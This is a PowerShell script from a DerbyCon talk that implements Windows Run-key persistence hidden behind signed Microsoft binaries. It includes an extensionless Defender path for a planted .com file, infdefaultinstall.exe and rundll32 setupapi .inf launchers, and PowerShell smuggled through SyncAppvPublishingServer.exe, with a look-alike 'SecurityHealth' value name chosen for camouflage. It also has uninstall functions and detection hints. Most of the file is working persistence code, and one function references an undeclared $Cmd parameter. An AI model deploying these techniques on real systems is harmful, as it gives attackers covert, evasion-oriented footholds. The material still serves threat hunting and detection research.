DerbyCon Autoruns Talk
<#
AutoRuns v1.0
License: GPLv3
Author: @ConsciousHacker
Credits: @HuntressLabs
References: https://github.com/huntresslabs/evading-autoruns

Purpose: demonstration of Run-key persistence entries that hide behind signed
Windows binaries (extensionless .com lookup, infdefaultinstall.exe, rundll32
setupapi InstallHinfSection, SyncAppvPublishingServer.exe). Every function
writes to HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, so an elevated
session is required, and the same command lines are the detection signatures a
defender should hunt for.
#>
function InstallAutoRuns-COM
{
    <#
    .SYNOPSIS
    Writes a Run-key value that points at an extensionless Windows Defender path.

    .DESCRIPTION
    The value stored is "C:\Program Files\Windows Defender\MSASCui" with no
    extension. The technique relies on extensionless command resolution trying
    .COM before .EXE, so a file named MSASCui.com placed in that directory is
    what actually runs instead of the genuine MSASCui.exe. Plant the scriptlet
    as "MSASCui.com" (the value written here is MSASCui, not MSASCuiL) before
    calling this. The value name is a look-alike chosen to blend in with real
    security entries. Writes under HKLM, so run from an elevated session.

    .NOTES
    Detection: a Run value whose image path carries no extension, or a .com file
    appearing under the Windows Defender directory, is a strong hunting signal.
    #>
    $runKey      = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
    $lookalike   = "SecurityHealth"
    $targetPath  = '"C:\Program Files\Windows Defender\MSASCui"'

    Set-ItemProperty -Path $runKey -Name $lookalike -Value $targetPath -Type ExpandString
}
function UninstallAutoRuns-COM
{
    <#
    .SYNOPSIS
    Rewrites the "SecurityHealth" Run value to the real MSASCui.exe path.

    .DESCRIPTION
    Unlike the other Uninstall-* functions in this file, this does NOT delete the
    value with Remove-ItemProperty; it overwrites it so the entry now launches the
    genuine "C:\Program Files\Windows Defender\MSASCui.exe". The Run entry itself
    is therefore left behind after "uninstall". Any MSASCui.com planted for the
    install step is not touched either; remove it by hand.

    .NOTES
    NOTE(review): if a clean host is the goal, a Remove-ItemProperty on the value
    would be the consistent choice; kept as-is to preserve the original behaviour.
    #>
    $runKey     = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
    $lookalike  = "SecurityHealth"
    $realBinary = '"C:\Program Files\Windows Defender\MSASCui.exe"'

    Set-ItemProperty -Path $runKey -Name $lookalike -Value $realBinary -Type ExpandString
}
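function InstallAutoRuns-INFDefaultInstall
{
    <#
    .SYNOPSIS
    Adds a Run-key value that launches infdefaultinstall.exe against an .inf file.

    .DESCRIPTION
    Persists by having the signed Windows binary infdefaultinstall.exe process the
    supplied .inf at logon. The .inf is not generated here; see the example at
    https://github.com/huntresslabs/evading-autoruns/blob/master/shady.inf.
    Writes under HKLM, so an elevated session is required.

    .PARAMETER Path
    Full path to the .inf file that infdefaultinstall.exe should process.
    Passed through verbatim; no existence check is made so the file can be
    planted after the key is written.

    .PARAMETER Name
    Registry value name. Defaults to "INF Default Install" (the original
    hard-coded name) so existing callers are unaffected.

    .NOTES
    NOTE(review): the whole command, binary and argument together, is wrapped in
    one pair of double quotes. Conventional Run values quote only the image path
    ("exe" args); confirm on a test host that this form actually launches before
    relying on it, and match any change in the Uninstall counterpart.
    Detection: infdefaultinstall.exe referenced from a Run value, or launched by
    explorer.exe at logon, is a high-signal event.
    #>
    param
    (
        [Parameter(Mandatory = $True)]
        [string]$Path,

        [Parameter(Mandatory = $False)]
        [string]$Name = "INF Default Install"
    )

    $runKey  = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
    # Same construction as before: the argument is concatenated without escaping.
    $command = '"C:\Windows\system32\infdefaultinstall.exe ' + $Path + '"'

    Set-ItemProperty -Path $runKey -Name $Name -Value $command -Type ExpandString
}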
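function UninstallAutoRuns-INFDefaultInstall
{
    <#
    .SYNOPSIS
    Removes the infdefaultinstall.exe Run-key value.

    .DESCRIPTION
    Deletes the value with Remove-ItemProperty. The .inf file on disk is not
    removed; clean it up separately. Writes under HKLM, so an elevated session
    is required.

    .PARAMETER Path
    Accepted for backward compatibility only. The original declared it mandatory
    but never used it (it was copied into an unused local), so it is now optional
    and ignored.

    .PARAMETER Name
    Registry value name to delete. Defaults to "INF Default Install", matching
    the name the install function writes.
    #>
    param
    (
        [Parameter(Mandatory = $False)]
        [string]$Path,

        [Parameter(Mandatory = $False)]
        [string]$Name = "INF Default Install"
    )

    $runKey = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

    Remove-ItemProperty -Path $runKey -Name $Name
}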
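function InstallAutoRuns-SquiblydooINF
{
    <#
    .SYNOPSIS
    Adds a Run-key value that runs an .inf through rundll32 setupapi,InstallHinfSection.

    .DESCRIPTION
    Persists via the signed binary rundll32.exe calling setupapi's InstallHinfSection
    export on the "ModelsSection" of the supplied .inf (the 128 flag is passed as in
    the original). The .inf is not generated here; see
    https://github.com/huntresslabs/evading-autoruns/blob/master/shady.inf.
    Writes under HKLM, so an elevated session is required.

    .PARAMETER Path
    Full path to the .inf file. Passed through verbatim with no existence check.

    .PARAMETER Name
    Registry value name. Defaults to "Squiblydoo" (the original hard-coded name).
    The label is kept for compatibility even though the technique here is the
    rundll32/setupapi one rather than the regsvr32 scriptlet trick that name is
    usually attached to.

    .NOTES
    NOTE(review): as with the INF Default Install variant, binary and arguments are
    wrapped together in a single pair of double quotes; verify on a test host that
    this form launches before depending on it.
    Detection: "rundll32.exe setupapi,InstallHinfSection" in a Run value or in a
    logon-time process command line is a well-known LOLBin pattern.
    #>
    param
    (
        [Parameter(Mandatory = $True)]
        [string]$Path,

        [Parameter(Mandatory = $False)]
        [string]$Name = "Squiblydoo"
    )

    $runKey  = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
    # Same construction as before: the argument is concatenated without escaping.
    $command = '"C:\Windows\system32\rundll32.exe setupapi,InstallHinfSection ModelsSection 128 ' + $Path + '"'

    Set-ItemProperty -Path $runKey -Name $Name -Value $command -Type ExpandString
}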
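function UninstallAutoRuns-SquiblydooINF
{
    <#
    .SYNOPSIS
    Removes the rundll32/setupapi Run-key value.

    .DESCRIPTION
    Deletes the value with Remove-ItemProperty. The .inf file on disk is left in
    place. Writes under HKLM, so an elevated session is required.

    .PARAMETER Path
    Accepted for backward compatibility only. The original declared it mandatory
    but never used it, so it is now optional and ignored.

    .PARAMETER Name
    Registry value name to delete. Defaults to "Squiblydoo", matching the name the
    install function writes.
    #>
    param
    (
        [Parameter(Mandatory = $False)]
        [string]$Path,

        [Parameter(Mandatory = $False)]
        [string]$Name = "Squiblydoo"
    )

    $runKey = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

    Remove-ItemProperty -Path $runKey -Name $Name
}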
function InstallAutoRuns-SyncAppvPublishing
{
    <#
    .SYNOPSIS
    Adds a Run-key value that smuggles a PowerShell command through SyncAppvPublishingServer.exe.

    .DESCRIPTION
    SyncAppvPublishingServer.exe hands its arguments to PowerShell, so a ";" in the
    argument lets arbitrary PowerShell run under a signed Microsoft binary. $Cmd is
    spliced into the value verbatim after ".; " with no escaping; that is the point
    of the technique, but it also means a $Cmd containing quotes will change how the
    resulting command line is parsed. Writes under HKLM, so run elevated.

    .PARAMETER Cmd
    PowerShell text to execute at logon. Inserted unmodified.

    .NOTES
    NOTE(review): the value is built as "<exe>".; <cmd>"" -- the quote placement
    is unusual (no quote opens before ".;" and two close at the end). Reproduced
    exactly; confirm on a test host that the intended command executes.
    Detection: SyncAppvPublishingServer.exe with ";" in its command line, or that
    binary spawning powershell.exe, is a high-signal event.
    #>
    $runKey    = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
    $valueName = "SyncAppvPublishing"
    $command   = '"C:\Windows\system32\SyncAppvPublishingServer.exe".; {0}""' -f $Cmd

    Set-ItemProperty -Path $runKey -Name $valueName -Value $command -Type ExpandString
}
function UninstallAutoRuns-SyncAppvPublishing
{
    <#
    .SYNOPSIS
    Removes the "SyncAppvPublishing" Run-key value.

    .DESCRIPTION
    Deletes the value written by InstallAutoRuns-SyncAppvPublishing using
    Remove-ItemProperty. Requires an elevated session because the key is under HKLM.
    #>
    $runKey    = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
    $valueName = "SyncAppvPublishing"

    Remove-ItemProperty -Path $runKey -Name $valueName
}